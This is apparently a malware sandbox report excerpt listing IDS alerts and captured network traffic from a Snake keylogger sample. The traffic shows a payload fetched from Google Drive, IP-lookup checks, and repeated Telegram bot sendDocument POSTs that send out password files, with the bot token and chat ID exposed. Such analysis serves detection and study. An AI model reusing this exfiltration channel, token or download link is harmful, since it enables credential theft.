            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49994 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50032 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49994 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50032 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49988 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50070 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50070 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50034 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49986 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50044 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49986 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50044 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50034 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49988 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50010 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50054 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50054 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50010 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50042 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50040 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50042 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50040 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50002 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50002 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50060 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50060 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50024 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50024 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50056 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50056 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50072 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50062 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50062 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50072 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50020 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50064 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50020 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50064 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50048 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50028 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50048 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50028 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50046 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50046 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50026 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50026 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50066 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50066 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd319443444d0bHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31aa95a100c4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31c0d732686bHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31d7081d0af9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31e63d9f7e32Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31fc4d4fd6e7Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3210ec87651fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3222bf0eb193Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32389e6415d8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd324d101c9dc9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd326016923807Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3275c3beec6fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd328cb97b4bfdHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd329f93438a7aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32b3b773e5e7Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32c3c9fc6045Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32d7d284421eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32ebcbf40f9aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32fe62e3e93fHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33123f8d9267Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3324bc118176Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33387c549528Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd334ade3c8869Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3367a8105a58Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd337dd438127dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd339688ded35dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33b076f9a624Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33ca520e7546Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33e6acba1ad5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd340583ccdc25Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3426d43febc9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34480a945b45Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd346e41e58404Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3496e44435c9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34c5bacc94c0Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34f46a70432aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3537167c6af8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd357c0f145e3dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35b812061467Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3602d21a3415Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd366edcb90021Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd36fd39d5822dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd37464fcfa082Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd37840a32eeabHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd37db51e674d1Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31947219ce40Host: api.telegram.orgContent-Length: 1090
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
            Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.3:49982 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.3:49979 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:49957 -> 172.217.16.206:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
